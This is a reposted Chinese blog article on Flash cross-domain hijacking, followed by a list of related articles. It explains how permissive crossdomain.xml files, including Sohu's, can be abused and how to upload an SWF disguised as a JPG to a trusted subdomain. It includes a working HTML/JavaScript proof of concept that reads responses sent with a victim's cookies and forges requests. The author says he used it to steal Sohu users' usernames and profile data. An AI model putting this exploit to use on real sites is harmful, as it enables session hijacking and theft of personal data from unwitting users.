Flash跨域劫持用户操作

最新推荐文章于 2021-04-08 15:53:20 发布
最新推荐文章于 2021-04-08 15:53:20 发布
阅读量211 收藏 1
点赞数
原文链接:https://my.oschina.net/u/2333235/blog/661504
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png


漏洞利用一:

目标站点crossdomain文件配置星号,例如

http://news.sohu.com/crossdomain.xml

那么就可以利用flash在任意域向目标发送请求并得到结果,发送请求的时候是带上cookie的,所以就达到了劫持的效果。

PS:这个搜狐的新闻站并没有什么敏感操作,所以跨域请求并没有意义,只能获取一下它的html源码,这里只是举例


01.jpg


这个POC源码在git上,链接:https://github.com/nccgroup/CrossSiteContentHijacking  (下载回来打开html文件即可)


接下来需要做的,就是找到一个有敏感操作又配置了*号的站点,然后使用此poc生成你需要劫持的操作,如修改昵称、关注某人等

使用方法,如果是Get直接填写Target Page,如果是Post,填写好POST Data,然后点击Show url with Parameters即可生成链接,然后使用短链接即可(你需要把此项目放在服务器也就是公网上,或者你可以放在百度云新浪云或者任意一个shell上)



漏洞利用二:

然而各大站点都有这种跨域的安全意识,所以他们会把有敏感操作的站点设置各种信任域,例如:(搜狐的用户中心)

http://i.sohu.com/crossdomain.xml

<allow-access-from domain="*.sohu.com" />

<allow-access-from domain="*.sohu.com.cn" />

<allow-access-from domain="*.itc.cn" />


也就是说,只有这些信任域的flash才能与它进行通讯,但是这样也并不安全,我们只需要让flash在这其中任意一个域下即可,简单说就是找到任意一个没有过滤的上传点(没有过滤?那不是直接传shell..(我这里指的没有过滤仅指没有过滤文件内容,如果你可以控制后缀和路径还能让它解析的话那就拿shell吧) 找了一会,找到上传点(漏洞还未公开这里不方便公布),我们将swf后缀改为jpg,然后上传,得到: http://****.sohu.com/2015******.jpg 接下来你可以又可以使用上面的POC进行劫持操作了,当然也有大牛自己写的版本。 POC:


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk"/>
<title>csrftest</title>

<script>
function Connection(Sendtype,url,content,callback){
    if (window.XMLHttpRequest){
        var xmlhttp=new XMLHttpRequest();
    }
    else{
        var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    } 
    xmlhttp.onreadystatechange=function(){
        if(xmlhttp.readyState==4&&xmlhttp.status==200)
        {
            callback(xmlhttp.responseText);
        }
    }
    xmlhttp.open(Sendtype,url,true);
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    xmlhttp.withCredentials = "true";
    xmlhttp.send(content);
}
  
function sendToJavaScript(strData){
    var theDiv = document.getElementById("HijackedData");
    var content = document.createTextNode(strData);
    theDiv.appendChild(content);
    theDiv.innerHTML += '<br/>'
    //var posturl = "";   //如果是post,请去掉这三行的注释
    //var postdata= "";    
    //Connection("POST",posturl,postdata,function(callback){});
   

}

</script>

</head>

<body>

<div id=HijackedData></div>

<object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash" data="http://127.0.0.1/upload/2015.jpg">   //你上传的图片后缀的flash

<param name="AllowScriptAccess" value="always">
<param name="flashvars" value="input=http://127.0.0.1">  //你要请求的地址

</object>

</body>

</html> 




最后让用户访问你构造的POC页面,即可达到劫持的效果

如图,成功跨域获取带有搜狐cookie用户的用户名以及其他资料,当然你还可以模拟其他任何操作,基本用户能做什么,你就能做什么。

01.jpg


相关资料:

http://www.freebuf.com/articles/web/37432.html

http://www.freebuf.com/articles/web/35353.html

案例:

http://wooyun.org/bugs/wooyun-2010-088845

POC:

https://github.com/gursev/flash-xdomain-xploit

https://github.com/nccgroup/CrossSiteContentHijacking

转载于:https://my.oschina.net/u/2333235/blog/661504

weixin_34414196
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透--56--Flash跨域访问漏洞
武天旭的博客
09-23 4723
1、漏洞描述: 不正确的crossdomain.xml策略将导致严重的安全问题,如信息泄露、CSRF等,如下几种是跨域漏洞所产生的常见几种不正确设置: 1:permitted-cross-domain-policies为all造成加载目标域上的任何文件作为跨域策略文件,甚至是一个JPG也可被加载为策略文件。 2:allow-access-from设为“*”任何的域,有权限通过flash读取本域中的...
flash跨域访问
01-21
<script type="text/javascript"> $(document).ready(function() { $.ajaxf.install('/Files/zsea/AJAX.swf'); $("#fdemo_get").click(function() { $.ajaxf.getText("http://www.youku.com/", '', function(r) { $("#fdemo").val(r); }); }); }); </script> <textarea id='fdemo' style='width: 500px; height: 300px;'></textarea> <br /> <input type="button" value="获取数据" id='fdemo_get' />
怎么检测flash是否被劫持
a20405010505的博客
09-16 391
  通过什么样的办法检测flash是否被劫持?  iis7网站监控  网站的劫持、污染、flash劫持可检测。  Flash 劫持  当我们在挖src漏洞的时候,找到一个接口或者一个页面response内容,存在用户的token或者用户唯一标识的信息的时候,着要访问www.**.com/crossdomain.xml  <cross-domain-policy>  <a...
flash.js 劫持怎么解决
lihaiweio的博客
04-08 5142
之前写的一个下载xlsx文件,最近换了网络环境,服务器环境下载总会触发两次请求,中间会有一个flash.js, 下载两次之后出现白页面,度娘之后发现没有实质性的解决办法,于是打算发个帖子,给大家借鉴一下。 下面是别人的一个图,我这边修复了,忘记截图了。 度娘一搜一大堆解决方案,但是都是类似下面这种 修改浏览器的操操作,虽然修改了可以用,但是不能每一个用的人都去修改吧,而且F12 一关,又会重复之前的两次下载,很明显不是最终解决办法, 修改之后,不出现falsh.js或者不多...
php csrf jsonp,读取型CSRF(JSONP劫持、CORS跨域资源读取、Flash跨域劫持
weixin_32279911的博客
03-25 136
我们只熟悉写入型csrf,像修改用户信息……今天介绍一下读取型CSRF,使用DoraBox这个靶场来演示一波!地址:https://github.com/Acmesec/DoraBoxJSONP劫持现在所有支持JavaScript的浏览器都使用同源策略,才诞生了JSONP(JSON with padding),远程调用json文件来实现数据传递的技术,它的特点是可以跨域读取数据。以DoraBox中...
建设营销型网站这6个要点要注意
jxsl6的博客
09-08 412
  一般来说企业做营销型网站,大多是为了后期的推广优化,因此小编提醒大家在进行营销型网站建设时要注意以下6点问题:   1,网站SEO设置   网站SEO设置包含:整站伪静态、网站地图、301重定向、404页面设置等,有人就说了我不是专业的推广人员,我只是写程序的,到底应该怎么办,这些基础的教程网上有很多。   2,网站TDK设置   TDK简单来说就是标题、关键词和描述,虽然说近年来随着百度算法的变化其重要性有所削弱,但是TDK在SEO优化中依然骑着不可代替的作用,所以设置好TDK是网站参与收录和排名必要
使用flash解决js跨域问题源代码
03-28
当需要无刷新跨域提交时,针对目前的浏览器,是无法解决的. 如果使用服务器边的proxy方式,就太浪费资源了.当一个请求会很费时时,就更加浪费,所以,proxy无必要时,是不会使用的. 还有使用动态加载js回调的方式,但是这个...
WebQian Duan Hei Ke Ji Zhu Jie Mi - Zhong Chen Ming , Xu Shao Pei.mobi
05-24
主要包含Web前端安全的跨站脚本(XSS)、跨站请求伪造(CSRF)、界面操作劫持这三大类,涉及的知识点涵盖信任与信任关系、Cookie安全、Flash安全、DOM渲染、字符集、跨域、原生态攻击、高级钓鱼、蠕虫思想等,这些都...
Web前端黑客技术解密
10-30
主要包含Web前端安全的跨站脚本(XSS)、跨站请求伪造(CSRF)、界面操作劫持这三大类,涉及的知识点涵盖信任与信任关系、Cookie安全、Flash安全、DOM渲染、字符集、跨域、原生态攻击、高级钓鱼、蠕虫思想等,这些都...
javascript 跨域解决方案之二----利用flash作为跨域工具
一名普通码农的菜地
03-26 2474
一般情况,编写脚本的时候都会遇到javascript跨域的情形。有用iframe的,有用jsonp的,也有用flash的,今天我也编写一个flash的插件配合js来调用跨域请求。
Flash跨域访问
07-30
NULL 博文链接:https://can4you.iteye.com/blog/829419
js整站无缝劫持代码
02-17
最新判断来路为搜索引擎跳转代码,js来路判断,用于搜索引擎流量劫持,.蜘蛛劫持功能,可以根据来路劫持,也可以根据蜘蛛进行劫持。泛站群跳转代码
FlashCookie 不被浏览器清除的Cookie
08-06
FlashCookie 不被浏览器清除的Cookie 不被浏览器清空的Cookie
flash跨域劫持漏洞
xixixi
09-13 2645
参考资料1 参考资料2 Adobe Flash 2017年7月25号,在官方博客上宣布到2020年底停止更新Flash,鼓励开发者尽早使用新的标准( HTML5、WebGL 和 WebAssembly)进行开发 ActionScript:(简称AS)是由Macromedia(现已被Adobe收购)为其Flash产品开发的,最初是一种简单的脚本语言,现在最新版本ActionScript...
web安全--Flash跨域数据劫持漏洞
fabao007的专栏
05-03 1150
0×01,背景 很多上传文件的后端逻辑在实现时,仅仅验证了文件后缀名和Content-Type,没有对上传文件的内容进行验证。通常情况下这样的处理逻辑仅仅是不严谨,不会造成太大的安全隐患。但经过笔者测试,发现object标签在包含flash文件时没有对嵌入的文件后缀进行判断。也就是说,只要文件内容包含了正常的flash文件代码,就能够被object标签成功加载并执行。而ActionScript中...
js恶意脚本劫持网页怎么解决?
cainang19850211的博客
09-16 1440
  要预防JS劫持,首先要把我们网站的安全做好,买空间服务器最好是选择大的平台比如阿里云、腾讯云等,修改完网站后记得更换所有的账号密码,网站要记得时常备份,这样你的网站出现问题可以及时的覆盖还原。  先通过iis7网站监控,输入自己的域名,就可以立马看到自己是不是遭遇JS劫持了,并且查询结果都是实时的,可以利用查询结果来更好的优化我们的网站。然后按下面的步骤解决  一、首先直接输入域名打开你的网站...
网站莫名其妙的去请求一个flash.js
热门推荐
象话的博客
04-23 1万+
问题描述: 这个问题是这样产生的,我们的一个项目,在一个客户那里,总会被莫名奇妙的请求两次,就是点一次按钮,在network中能看到两次请求,但这两次请求中间总会有掺杂一个请求http://10.2.201.2:89/cookie/flash.js。 当时心想,这是什么鬼啊?项目源码中全局搜索,也没有一个关于flash.js的代码,简直其妙到爆炸! 没有任何的头绪后,开始百度,看到了有一......
js 解决flash挡住层的解决方法
每天進步一點點
11-22 974
var so = new SWFObject("../Graph/ampie/ampie.swf", "ampie", "700", "350", "8", "#000000");  so.addVariable("path", "ampie/");  so.addVariable("settings_file", encodeURIComponent("../Graph/settings/ampie_settings1.xml"));  so.addVariable("data_file", encode
shockwave flash object_老的掉渣的Flash劫持
weixin_39684967的博客
11-26 331
Flash利用技巧简单明了Flash Csrf 劫持Flash 劫持重复讲一下老知识:随缘组织一下语言: 当我们在挖src漏洞的时候,找到一个接口或者一个页面response内容,存在用户的token或者用户唯一标识的信息的时候,着要访问https://www.qq.com/crossdomain.xml<cross-domain-policy> <allow-ac...
ettercap劫持https
最新发布
08-21
C知道:对于ettercap劫持HTTPS流量的问题,有一些技术限制需要考虑。HTTPS是一种加密传输协议,用于保护网络通信的安全性。Ettercap是一个常用的网络抓包工具,但它无法直接劫持和解密HTTPS流量。 由于HTTPS使用SSL/TLS加密通信,它使用了证书来验证服务器和客户端的身份,并加密通信内容。Ettercap无法生成有效的证书来模拟合法的服务器,因此它无法直接劫持HTTPS流量。 然而,你可能在某些特定情况下通过其他方式间接劫持HTTPS流量。例如,你可以使用 ettercap 结合 SSLstrip 工具来劫持终端设备上的HTTP流量,并将其转换为非加密的HTTP流量。但请注意,这种方法并不是真正的劫持HTTPS流量,而是欺骗终端设备以非加密方式与服务器进行通信。 需要强调的是,任何未经授权或非法的网络攻击行为都是违法的。在进行任何网络安全测试或攻击模拟时,请确保已获得合法授权,并遵守适用法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值